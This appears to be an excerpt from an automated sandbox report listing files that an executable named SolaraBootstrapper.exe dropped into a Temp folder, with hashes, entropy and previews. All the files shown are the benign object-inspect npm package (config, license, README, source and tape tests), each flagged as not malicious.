                                                  Preview:{. "root": true,. "extends": "@ljharb",. "rules": {. "complexity": 0,. "func-style": [2, "declaration"],. "indent": [2, 4],. "max-lines": 1,. "max-lines-per-function": 1,. "max-params": [2, 4],. "max-statements": 0,. "max-statements-per-line": [2, { "max": 2 }],. "no-magic-numbers": 0,. "no-param-reassign": 1,. "strict": 0, // TODO. },. "overrides": [. {. "files": ["test/**", "test-*", "example/**"],. "extends": "@ljharb/eslint-config/tests",. "rules": {. "id-length": 0,. },. },. {. "files": ["example/**"],. "rules": {. "no-console": 0,. },. },. {. "files": ["test/browser/**"],. "env": {. "browser": true,. },. },. {. "files": ["test/bigint*"],. "rules": {. "new
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):585
                                                  Entropy (8bit):4.701149886814445
                                                  Encrypted:false
                                                  SSDEEP:12:OjjcfQWARgMqJugMJPH0FggMMgflgM01bZBgMoGbQjgMy9gMLz4MI:qoQWAg0g+H0mgnKlg7g1GegJ9gEz4D
                                                  MD5:1080329B277136E270B1D9F46EC6198F
                                                  SHA1:329714C4D2C4FB4F75A17708BDB8372FFB087402
                                                  SHA-256:C5D7D674C3932A7E2962B172028B54A41540916A991CDD9EE0BF60F901EB00AE
                                                  SHA-512:D8EF9F2F1137B7C981AF53322AF6A6F0B96B41E13C24754FC6A95A4141220FA9EC63F57960B99ED739BE009E83ADF9BB95EC4F569DFF11FB04CB5AAB528F17E3
                                                  Malicious:false
                                                  Preview:# These are supported funding model platforms..github: [ljharb].patreon: # Replace with a single Patreon username.open_collective: # Replace with a single Open Collective username.ko_fi: # Replace with a single Ko-fi username.tidelift: npm/object-inspect.community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry.liberapay: # Replace with a single Liberapay username.issuehunt: # Replace with a single IssueHunt username.otechie: # Replace with a single Otechie username.custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2'].
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):236
                                                  Entropy (8bit):4.3441025829035045
                                                  Encrypted:false
                                                  SSDEEP:6:dpmSh9OfyMLC15IW5IudRaB9ZGeiMeIrJdqG//uWgW7M0CsC:XmEO6KSIWyuTaB94vM5rJdqovd/y
                                                  MD5:E3CA1E101DF537732DDFBABE9660F0CD
                                                  SHA1:FC1951C10D45C316DA074AB5970E2FDE75664F41
                                                  SHA-256:054EEDA03A706B8EB6821A2CC2D47080C7D6CB031C82252FF9A13460FEF3BB8E
                                                  SHA-512:BB2D5EF5D4FCFA7BD10CB59039FE394C3990CEE57BD04BFFFA1C720AA8B5C9A1116412EC8112096C4201762F4B7FEF9BB4AD9574B4C5196EBAB94124DD474473
                                                  Malicious:false
                                                  Preview:{. "all": true,. "check-coverage": false,. "instrumentation": false,. "sourceMap": false,. "reporter": ["text-summary", "text", "html", "json"],. "exclude": [. "coverage",. "example",. "test",. "test-core-js.js". ].}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text
                                                  Category:dropped
                                                  Size (bytes):33226
                                                  Entropy (8bit):5.2642497944684115
                                                  Encrypted:false
                                                  SSDEEP:384:EDrkOgLATKj4HAGAqw9eOrYnkiOC3CKTvuap6NMb8QclYo1IV7+DztX:EDwO7rAqRQYkihc06NNJ1s7EtX
                                                  MD5:BA98096406B0A4D08AB41CB8DA9BE1F5
                                                  SHA1:F57516529353B87743613506F6218E0A8E14BEC5
                                                  SHA-256:2ABFE4F34C8505191B12272923FA52EF6A1B6F57FBE0AC345F0EC6BD9D77F26C
                                                  SHA-512:B59CFE87CBAB2CC1912929F8E1EB0A3C7E240F9B3C3576D90B049D92429ED848B991DCAFBECFCA5F58369401378A4AAE949C1776BC1563F6B5B6089139BDC693
                                                  Malicious:false
                                                  Preview:# Changelog..All notable changes to this project will be documented in this file...The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html)...## [v1.13.1](https://github.com/inspect-js/object-inspect/compare/v1.13.0...v1.13.1) - 2023-10-19..### Commits..- [Fix] in IE 8, global can !== window despite them being prototypes of each other [`30d0859`](https://github.com/inspect-js/object-inspect/commit/30d0859dc4606cf75c2410edcd5d5c6355f8d372)..## [v1.13.0](https://github.com/inspect-js/object-inspect/compare/v1.12.3...v1.13.0) - 2023-10-14..### Commits..- [New] add special handling for the global object [`431bab2`](https://github.com/inspect-js/object-inspect/commit/431bab21a490ee51d35395966a504501e8c685da).- [Dev Deps] update `@ljharb/eslint-config`, `aud`, `tape` [`fd4f619`](https://github.com/inspect-js/object-inspect/commit/fd4f6193562b4b0e95dcf5c0201b4e8cbbc4f58d).- [Dev Deps]
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1071
                                                  Entropy (8bit):5.105115233241345
                                                  Encrypted:false
                                                  SSDEEP:24:2rmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:2aJHlxE3dQHOs5exm3ogFh
                                                  MD5:288162F1D1BFA064F127F2B42D2A656F
                                                  SHA1:316F0F178C369820DCCBAC7E4D5D54E4606F578B
                                                  SHA-256:BD40CC437E28A3AD7BEF2AD34E6B72E757B182E67BDA1ACADBAB4EF0476F8232
                                                  SHA-512:C52EAC54E782280792A159E2678EC15447C21CE7EB9F59E13DAB9D6D247AEFD3B99B0CB13C73ADBB6022F4DDFB5C436D2AE9F1547356714E6457521342EA9B11
                                                  Malicious:false
                                                  Preview:MIT License..Copyright (c) 2013 James Halliday..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONN
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):391
                                                  Entropy (8bit):4.661165065013885
                                                  Encrypted:false
                                                  SSDEEP:6:Qhxi5mXe69QsKKiKRZggWotmqqpMF4D/gJFzWbWvNFCMsFLaYwKGAfv:siUXe69bKyD/ZEqqqqUJFzWoYFLT/Gyv
                                                  MD5:B8D442ED717383560FEB97C876F25ABA
                                                  SHA1:FF17B58E84D8D114C426DEDF40DAAA7A9293412D
                                                  SHA-256:FCF0C7B568EB8914F89824172EC41782C57070BDC813D5FE27F165A90F628078
                                                  SHA-512:DF5ED218FCA9B77099A8E96D4991BC1A470021B89D03CE16B818F17C7B0BB9CE1C6461E98B04B33AE0CAF7D066D5828B3AFB707E62B0A3D350C2604A541C18C1
                                                  Malicious:false
                                                  Preview:'use strict';..var inspect = require('../');.var Buffer = require('safer-buffer').Buffer;..var holes = ['a', 'b'];.holes[4] = 'e';.holes[6] = 'g';..var obj = {. a: 1,. b: [3, 4, undefined, null],. c: undefined,. d: null,. e: {. regex: /^x/i,. buf: Buffer.from('abc'),. holes: holes. },. now: new Date().};.obj.self = obj;.console.log(inspect(obj));.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):116
                                                  Entropy (8bit):4.7623169151259654
                                                  Encrypted:false
                                                  SSDEEP:3:agWIFMiVArFXAUprHR+mL3mY3tcPzWAgGeHUvn:Qhx/R+mLf3KyAfv
                                                  MD5:0C8451B3BAC0583E123CB7B1050FB6AB
                                                  SHA1:37E1A753EF1553066F30DC096283352C19AE06EF
                                                  SHA-256:B73A9884E6566F11892FE8D2C42000170109E9A2EBB47E9FEE80FA8E040AAA5A
                                                  SHA-512:F5D0D89DFE247A2BE76F32E1A7E17E76870A4D6B8564EE091D34E1856029F4F4C4BF9A600D7B47C2CB261E33D208390CA106F217E3EA57C5AB22A55514123118
                                                  Malicious:false
                                                  Preview:'use strict';..var inspect = require('../');.var obj = { a: 1, b: [3, 4] };.obj.c = obj;.console.log(inspect(obj));.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):126
                                                  Entropy (8bit):4.760078617188589
                                                  Encrypted:false
                                                  SSDEEP:3:agWIFMiVArFXAUprHxQFwyXt3t0Qbx0fkFCKAgGeHUvn:Qhx/xQay93C9fMCKAfv
                                                  MD5:AF9618022DB9BA0071797196C10D751A
                                                  SHA1:D7295C7B7D9B73E6760C96E1A9B8BDA6B45FCE6B
                                                  SHA-256:FF646D533194CD0B8A6C684B82E899C0930A3EBF944ABDEE8070C7C84F6A0BEF
                                                  SHA-512:F6BBC3329238159039A73E81FCD8E43E862A76DA22DD092326176B7235555E1DC32858187E8E1E4C0AE0F9ADF0E91FB7FE031EBD1184950D296C07DEDEAB2B05
                                                  Malicious:false
                                                  Preview:'use strict';..var inspect = require('../');.var obj = [1, 2, function f(n) { return n + 5; }, 4];.console.log(inspect(obj));.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):251
                                                  Entropy (8bit):5.079275931527289
                                                  Encrypted:false
                                                  SSDEEP:6:QaQIcA8gxs78mgO9lcHPbwieCaMe7guAOe+kztcJNbIYBfv:q9LasYucHPZeCaMeEjlcJhImfv
                                                  MD5:07A5BAC8D2A636ECE191D742F496169D
                                                  SHA1:537253E832602C4839F935BDE340C49A0CD44AA2
                                                  SHA-256:060983EDB7C1A8350A7DACBE2F209D96C62B657B0FFBBEBBFE7FC3CD19E58E77
                                                  SHA-512:2722402D6FCE40FF917D759F322C4944DA71BA9A68D24292D876A36AE62CA2BCAA8677DB4FE6AC6B7BF631CD52BBF121B3AA838FBAA9F1A5339BA26C073A2D53
                                                  Malicious:false
                                                  Preview:'use strict';../* eslint-env browser */.var inspect = require('../');..var d = document.createElement('div');.d.setAttribute('id', 'beep');.d.innerHTML = '<b>wooo</b><i>iiiii</i>';..console.log(inspect([d, { a: 3, b: 4, c: [5, 6, [7, [8, [9]]]] }]));.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):18882
                                                  Entropy (8bit):4.834012149504999
                                                  Encrypted:false
                                                  SSDEEP:384:BNspDgYPWTFfB8OnNR6zAvnlxpCZydTgNR2cy5Y/o8xhEJl:BuxgYsWOnNozOx+yxgv2Zh
                                                  MD5:30AEC21DA8FC4B15F237A4D6B99D1A9B
                                                  SHA1:362295D5C15B784BFAED0E8E0842E480B62EF811
                                                  SHA-256:FF92423AB1DB977C56B6A8F8BF38EA0DE97590E96DFA18ADA2639EDE3CA9CB42
                                                  SHA-512:3164926F777EF113310519E249CE766223B5A967CC8638F1859B159DAE4A0B4971ABAA5184E29953E168F415EF9FB11DEA74C78154999B9BB846EECAABE56E58
                                                  Malicious:false
                                                  Preview:var hasMap = typeof Map === 'function' && Map.prototype;.var mapSizeDescriptor = Object.getOwnPropertyDescriptor && hasMap ? Object.getOwnPropertyDescriptor(Map.prototype, 'size') : null;.var mapSize = hasMap && mapSizeDescriptor && typeof mapSizeDescriptor.get === 'function' ? mapSizeDescriptor.get : null;.var mapForEach = hasMap && Map.prototype.forEach;.var hasSet = typeof Set === 'function' && Set.prototype;.var setSizeDescriptor = Object.getOwnPropertyDescriptor && hasSet ? Object.getOwnPropertyDescriptor(Set.prototype, 'size') : null;.var setSize = hasSet && setSizeDescriptor && typeof setSizeDescriptor.get === 'function' ? setSizeDescriptor.get : null;.var setForEach = hasSet && Set.prototype.forEach;.var hasWeakMap = typeof WeakMap === 'function' && WeakMap.prototype;.var weakMapHas = hasWeakMap ? WeakMap.prototype.has : null;.var hasWeakSet = typeof WeakSet === 'function' && WeakSet.prototype;.var weakSetHas = hasWeakSet ? WeakSet.prototype.has : null;.var hasWeakRef = typeof
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):365
                                                  Entropy (8bit):4.006285574018992
                                                  Encrypted:false
                                                  SSDEEP:6:lQS1kS0Nw2TsjCAnqH1UnPoLkwN6akf0Ga0Qi7FZ8v:d1d0N36qVskkxak7aMv+
                                                  MD5:6FCE49F76312774C181AACAA28EB6F03
                                                  SHA1:ABDBD6FD5882FA792B013CDE86BB8CE0E0988B0D
                                                  SHA-256:1D6770F17CA57A021AF57C931EBD3C787D0D06EBAED27DA98CFCC2EF77633247
                                                  SHA-512:E1AFFADF56B6C28303DE6C229D25D05AB44F27F47B161156F3DA5521670F33150033B9EF511267136490E5B0E715D41FD2434BEB9BCF3247ECE99E30F2CBE808
                                                  Malicious:false
                                                  Preview:{. "versions": [. {. "version": "*",. "target": {. "node": "all". },. "response": {. "type": "time-permitting". },. "backing": {. "npm-funding": true,. "donations": [. "https://github.com/ljharb",. "https://tidelift.com/funding/github/npm/object-inspect". ]. }. }. ].}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):2702
                                                  Entropy (8bit):4.788682108499932
                                                  Encrypted:false
                                                  SSDEEP:48:d1upQssIqgNpjqUL+7hALhag84+pB6M6X/YsEg4Gpu48H3swNCqQ94VZg:mpQswUhh+n63e3Gpu48H3tCqQ2e
                                                  MD5:883B6091188E84E9DA4678F187C5251A
                                                  SHA1:183856BC2F8CE3237B57E70C9D2EFF482DE00732
                                                  SHA-256:8C3D7D1600BAAC2F157420293E74D75CD848771F6B5EB0F3EF836631051E3753
                                                  SHA-512:1363574F5355107EC24DFBAF5D946FAA080E1DCB1E7F0C8DF2E630EC97A2DBE76780AD3AAF4A047B538E4E89B965D991FEDF951CA8CC06CE6D51773E5C84CB5C
                                                  Malicious:false
                                                  Preview:{. "name": "object-inspect",. "version": "1.13.1",. "description": "string representations of objects in node and the browser",. "main": "index.js",. "sideEffects": false,. "devDependencies": {. "@ljharb/eslint-config": "^21.1.0",. "@pkgjs/support": "^0.0.6",. "auto-changelog": "^2.4.0",. "core-js": "^2.6.12",. "error-cause": "^1.0.6",. "es-value-fixtures": "^1.4.2",. "eslint": "=8.8.0",. "for-each": "^0.3.3",. "functions-have-names": "^1.2.3",. "glob": "=10.3.7",. "globalthis": "^1.0.3",. "has-tostringtag": "^1.0.0",. "in-publish": "^2.0.1",. "jackspeak": "=2.1.1",. "make-arrow-function": "^1.2.0",. "mock-property": "^1.0.2",. "npmignore": "^0.3.0",. "nyc": "^10.3.2",. "safe-publish-latest": "^2.0.0",. "string.prototype.repeat": "^1.0.0",. "tape": "^5.7.1". },. "scripts": {. "prepack": "npmignore --auto --commentLines=autogenerated",. "prepublish": "not-in-publish || npm run prepublishOnly",. "prepublishOn
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2934
                                                  Entropy (8bit):5.13814439819533
                                                  Encrypted:false
                                                  SSDEEP:48:DpQ1eI4ITUqpIgsB5hN18eIkDanK/baMIm9N9Ygl3Cy5IL0IoIsv:DpAXFnGgs7hN18H8anQbaiHxaLxVO
                                                  MD5:5CCC51D51BC408A112F55E14044326AA
                                                  SHA1:3D17CF7EC801109D00D971211CB4A4A0962E3F86
                                                  SHA-256:FBD54872FD590AE1C104BA3F9F0CC00E08898209736F7BA57BAC74185423D89E
                                                  SHA-512:E2F5E9F4ED4EACD3881E02F582ECB45F5746620012163EDE966E51D900F735A7316CA55F9E3F7EBAEEBEA9EB76E15167EC12914FC441A9018FB7CCC254317DC9
                                                  Malicious:false
                                                  Preview:# object-inspect <sup>[![Version Badge][2]][1]</sup>..string representations of objects in node and the browser..[![github actions][actions-image]][actions-url].[![coverage][codecov-image]][codecov-url].[![dependency status][5]][6].[![dev dependency status][7]][8].[![License][license-image]][license-url].[![Downloads][downloads-image]][downloads-url]..[![npm badge][11]][1]..# example..## circular..``` js.var inspect = require('object-inspect');.var obj = { a: 1, b: [3,4] };.obj.c = obj;.console.log(inspect(obj));.```..## dom element..``` js.var inspect = require('object-inspect');..var d = document.createElement('div');.d.setAttribute('id', 'beep');.d.innerHTML = '<b>wooo</b><i>iiiii</i>';..console.log(inspect([ d, { a: 3, b : 4, c: [5,6,[7,[8,[9]]]] } ]));.```..output:..```.[ <div id="beep">...</div>, { a: 3, b: 4, c: [ 5, 6, [ 7, [ 8, [ ... ] ] ] ] } ].```..# methods..``` js.var inspect = require('object-inspect').```..## var s = inspect(obj, opts={})..Return a string `s` with the st
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):534
                                                  Entropy (8bit):4.711811985853924
                                                  Encrypted:false
                                                  SSDEEP:12:F+9Ks1qm0ogZs1v/eo/Ms1gDQogeMs1E/goS:/s1qm0oqs1v/eoks1gDQoYs1E/goS
                                                  MD5:6B077CA4E0121955B25394433C54343C
                                                  SHA1:81087ABE28D26DAC0808D6C210390EA3D57A1232
                                                  SHA-256:16D580A89DEC81A3657E20D9F827768178ABE029BF31A950136A38852B493B9A
                                                  SHA-512:48C2346DC4FC4D832A7335E0D66AA638BCC097AB11E79B0E66389AC9B990D8CE8950CEE7FB3CA3D30EDD89E27AF6EEC3CDDEA1E727FAEFED89EDA24C82AF71D7
                                                  Malicious:false
                                                  Preview:'use strict';..require('core-js');..var inspect = require('./');.var test = require('tape');..test('Maps', function (t) {. t.equal(inspect(new Map([[1, 2]])), 'Map (1) {1 => 2}');. t.end();.});..test('WeakMaps', function (t) {. t.equal(inspect(new WeakMap([[{}, 2]])), 'WeakMap { ? }');. t.end();.});..test('Sets', function (t) {. t.equal(inspect(new Set([[1, 2]])), 'Set (1) {[ 1, 2 ]}');. t.end();.});..test('WeakSets', function (t) {. t.equal(inspect(new WeakSet([[1, 2]])), 'WeakSet { ? }');. t.end();.});.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2082
                                                  Entropy (8bit):4.792824681597972
                                                  Encrypted:false
                                                  SSDEEP:24:m2hNieJkdbNljEz+oNhEbLVy8+l8EEXOk95DAwNMLcC/h5OB7whJOXHwSwhuOSHu:pgmI8z+PfVvRHXOkUoCo1fvO
                                                  MD5:184BB2182A9A0391EF8D996DBFFEEDC2
                                                  SHA1:0D41749FE165079A5409E489C329E77579AA0A11
                                                  SHA-256:2FDE9C2F1050C282C681F7F8AE987E68668271E2DBCA302AF431505E26D5981C
                                                  SHA-512:A9CD46784436A0DC32E13BD5BC4EEE6CCB48FE07AD3868BF542CE75F61927794270D4D77AC23484F184A1303742A7F4AAFEB803E5396E6AC1155C049355C7BDE
                                                  Malicious:false
                                                  Preview:'use strict';..var inspect = require('../');.var test = require('tape');.var hasToStringTag = require('has-tostringtag/shams')();..test('bigint', { skip: typeof BigInt === 'undefined' }, function (t) {. t.test('primitives', function (st) {. st.plan(3);.. st.equal(inspect(BigInt(-256)), '-256n');. st.equal(inspect(BigInt(0)), '0n');. st.equal(inspect(BigInt(256)), '256n');. });.. t.test('objects', function (st) {. st.plan(3);.. st.equal(inspect(Object(BigInt(-256))), 'Object(-256n)');. st.equal(inspect(Object(BigInt(0))), 'Object(0n)');. st.equal(inspect(Object(BigInt(256))), 'Object(256n)');. });.. t.test('syntactic primitives', function (st) {. st.plan(3);.. /* eslint-disable no-new-func */. st.equal(inspect(Function('return -256n')()), '-256n');. st.equal(inspect(Function('return 0n')()), '0n');. st.equal(inspect(Function('return 256n')()), '256n');. });.. t.test('toStringT
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):416
                                                  Entropy (8bit):4.813440858707373
                                                  Encrypted:false
                                                  SSDEEP:12:tsAjYsucHNDeCaMelKkKklcJhImaOHl6XBw:lYsuctDyKXbJhImak6Xy
                                                  MD5:4B660AA43C5D4AB9AD1EBBB0A5E02C3A
                                                  SHA1:2CD5165CF9B8ADF1A6EA5F7A824F61B3263BE8E4
                                                  SHA-256:4450F3ADF5025565D98C6B8B8164884656D1187F9102636B016E7CF2895E8571
                                                  SHA-512:2B3548DCA370B40B86BF600FB526DB84311D7B4840FC60BC4F6087DB9AC399FC24BFD2F17CE1DEAF72F160987A43E00001FB3C51F0A29DECCA25233FBC5C9E48
                                                  Malicious:false
                                                  Preview:var inspect = require('../../');.var test = require('tape');..test('dom element', function (t) {. t.plan(1);.. var d = document.createElement('div');. d.setAttribute('id', 'beep');. d.innerHTML = '<b>wooo</b><i>iiiii</i>';.. t.equal(. inspect([d, { a: 3, b: 4, c: [5, 6, [7, [8, [9]]]] }]),. '[ <div id="beep">...</div>, { a: 3, b: 4, c: [ 5, 6, [ 7, [ 8, [Object] ] ] ] } ]'. );.});.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):451
                                                  Entropy (8bit):4.617011266776486
                                                  Encrypted:false
                                                  SSDEEP:6:qaxUALS8/wgC+mLfwFwSYyEkWcy/AZIF1NiYkZkncFktqmHLEcaV9NEh:tRS4TmDSRWL/641NiYm7mLEdn6h
                                                  MD5:5ABB264921988B179B7B5E00492660E5
                                                  SHA1:340F146693A8E99579CD9E61211FBB023030C7DC
                                                  SHA-256:E904CDDC6F53B4D0CA9171CEB31FE4039B8FEDEA78575863158B86A2EBA74D5C
                                                  SHA-512:A8EC790096EC28F83F21F0B455B0A0FDE534707E0A03B7AAEDB601E0AE669171BAA091D5B247E2EA35DA8AD0CF2801A7444167D3F14A318CBA45287AC6D8CAD5
                                                  Malicious:false
                                                  Preview:var inspect = require('../');.var test = require('tape');..test('circular', function (t) {. t.plan(2);. var obj = { a: 1, b: [3, 4] };. obj.c = obj;. t.equal(inspect(obj), '{ a: 1, b: [ 3, 4 ], c: [Circular] }');.. var double = {};. double.a = [double];. double.b = {};. double.b.inner = double.b;. double.b.obj = double;. t.equal(inspect(double), '{ a: [ [Circular] ], b: { inner: [Circular], obj: [Circular] } }');.});.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):400
                                                  Entropy (8bit):4.616069165611815
                                                  Encrypted:false
                                                  SSDEEP:12:tRkzzdUYi4+EECWoLRZ9t+ECVoLRh666+tcRit+A:kKLzEEDoLRZmEcoLR/LtcRhA
                                                  MD5:5D6AD24AD4F0B8F42D82BB5EBE29C7FF
                                                  SHA1:21FE20D3E3C14C823999A243D697F09DB1E80AA9
                                                  SHA-256:BFDD266350646F91F8B1367EE96925228FBB38C0FFA6AD285964465FAE5D2DD4
                                                  SHA-512:89C8E73609696A6C3186079A1A9DA7FED17725D0693BEE0F9A63FC1E215D93FC395415C2514031FB85DF0E21649C18737DA23CE8AFFD16FD956FAFA30DA3A137
                                                  Malicious:false
                                                  Preview:var inspect = require('../');.var test = require('tape');..test('deep', function (t) {. t.plan(4);. var obj = [[[[[[500]]]]]];. t.equal(inspect(obj), '[ [ [ [ [ [Array] ] ] ] ] ]');. t.equal(inspect(obj, { depth: 4 }), '[ [ [ [ [Array] ] ] ] ]');. t.equal(inspect(obj, { depth: 2 }), '[ [ [Array] ] ]');.. t.equal(inspect([[[{ a: 1 }]]], { depth: 3 }), '[ [ [ [Object] ] ] ]');.});.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1575
                                                  Entropy (8bit):4.803982543724783
                                                  Encrypted:false
                                                  SSDEEP:24:SqyIkySKrdEyLSK8tyLWRGLI8elKlhZlly8cwzKXY:SH9yS8LSsLsGLZh7cjwv
                                                  MD5:83A77BDF49696A35F8D832A5FC1A740D
                                                  SHA1:F6DAFEB02C2FFAAAE8158C013A13EAD3369050A0
                                                  SHA-256:603B3D295BC8114FCF9DF39CCFCB1AF3091AD7F50C7963B73D03F624D0E12DEF
                                                  SHA-512:D60BFACD02693A5C4852DB7682512269317FA1E24ED3DF206133B15518B23149767B108D8D5C5F6AB4DB3651A353E2BD4839C1457D103F4DB7A6FD07B1D9CBA9
                                                  Malicious:false
                                                  Preview:var inspect = require('../');.var test = require('tape');..test('element', function (t) {. t.plan(3);. var elem = {. nodeName: 'div',. attributes: [{ name: 'class', value: 'row' }],. getAttribute: function (key) { return key; },. childNodes: []. };. var obj = [1, elem, 3];. t.deepEqual(inspect(obj), '[ 1, <div class="row"></div>, 3 ]');. t.deepEqual(inspect(obj, { quoteStyle: 'single' }), "[ 1, <div class='row'></div>, 3 ]");. t.deepEqual(inspect(obj, { quoteStyle: 'double' }), '[ 1, <div class="row"></div>, 3 ]');.});..test('element no attr', function (t) {. t.plan(1);. var elem = {. nodeName: 'div',. getAttribute: function (key) { return key; },. childNodes: []. };. var obj = [1, elem, 3];. t.deepEqual(inspect(obj), '[ 1, <div></div>, 3 ]');.});..test('element with contents', function (t) {. t.plan(1);. var elem = {. nodeName: 'div',. getAttribute: function (key) { return key; },.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1536
                                                  Entropy (8bit):4.6049941739196125
                                                  Encrypted:false
                                                  SSDEEP:24:YCW0YGiAmQocGSXXkUA2uFFIwik/oWdJYW5LbhOZpou/MW/asEALIkf1U1Af1htU:5M8o3SnlfKdRthObnUpkf1U1Af1ha
                                                  MD5:597BF5A18387338A13F96892206A3A19
                                                  SHA1:FAA1A3859812D32F723D5F226AF6A322123CB104
                                                  SHA-256:3E673A17CBD47A527578D82AA9FEFF31621FCCA1BBF8D5FF88948633C3485644
                                                  SHA-512:3DF3824FEF57FA27959C9502329C9B5E40A0449D060F7C9259DF3DF0F4B299CBAFB0EC1BFFA35A40817312D54EA43C550502355AA323BBC9B3A33FBA8CF090C7
                                                  Malicious:false
                                                  Preview:var test = require('tape');.var ErrorWithCause = require('error-cause/Error');..var inspect = require('../');..test('type error', function (t) {. t.plan(1);. var aerr = new TypeError();. aerr.foo = 555;. aerr.bar = [1, 2, 3];.. var berr = new TypeError('tuv');. berr.baz = 555;.. var cerr = new SyntaxError();. cerr.message = 'whoa';. cerr['a-b'] = 5;.. var withCause = new ErrorWithCause('foo', { cause: 'bar' });. var withCausePlus = new ErrorWithCause('foo', { cause: 'bar' });. withCausePlus.foo = 'bar';. var withUndefinedCause = new ErrorWithCause('foo', { cause: undefined });. var withEnumerableCause = new Error('foo');. withEnumerableCause.cause = 'bar';.. var obj = [. new TypeError(),. new TypeError('xxx'),. aerr,. berr,. cerr,. withCause,. withCausePlus,. withUndefinedCause,. withEnumerableCause. ];. t.equal(inspect(obj), '[ ' + [. '[TypeError]',. '[Typ
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):683
                                                  Entropy (8bit):4.497758303715642
                                                  Encrypted:false
                                                  SSDEEP:12:sRV2hNclYLkvkBEGUKoD8FT2ddqr/4bbzsys564iL+b/FDR1nS:m2hNUrvkNToDvde4bEHiLKpRhS
                                                  MD5:1517782BC7C86D8D4EA9E90D33037EFE
                                                  SHA1:E78BEE2D9EEB0F7970DB84201F01941C919C63BD
                                                  SHA-256:95454B37E092016B765DC3702C9D60B363A62E8B03DB8F39F5E7E4D37B17AF82
                                                  SHA-512:24B5ECED9D52AA24E2FBAF9E02DE6AA4C907BD4162A98D575528C77FA26CCB407D3A37A8280B965027B12919D3FDA7E464037F46139D30D4B94BB9B7666640E2
                                                  Malicious:false
                                                  Preview:'use strict';..var inspect = require('../');.var test = require('tape');.var hasToStringTag = require('has-tostringtag/shams')();.var forEach = require('for-each');..test('fakes', { skip: !hasToStringTag }, function (t) {. forEach([. 'Array',. 'Boolean',. 'Date',. 'Error',. 'Number',. 'RegExp',. 'String'. ], function (expected) {. var faker = {};. faker[Symbol.toStringTag] = expected;.. t.equal(. inspect(faker),. '{ [Symbol(Symbol.toStringTag)]: \'' + expected + '\' }',. 'faker masquerading as ' + expected + ' is not shown as one'. );. });.. t.end();.});.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2227
                                                  Entropy (8bit):4.694473065755095
                                                  Encrypted:false
                                                  SSDEEP:24:A7D9Q0h3PjaSCmv+8aiZC7UYz8mv7Mva48mvPKTdWrmR+NCThDRiMF9aFaDKEuFd:A7G6m0vQNvA1vq40eUa7eQuZzaV
                                                  MD5:921058AF80F9803DB1A2C8F4D7F5E701
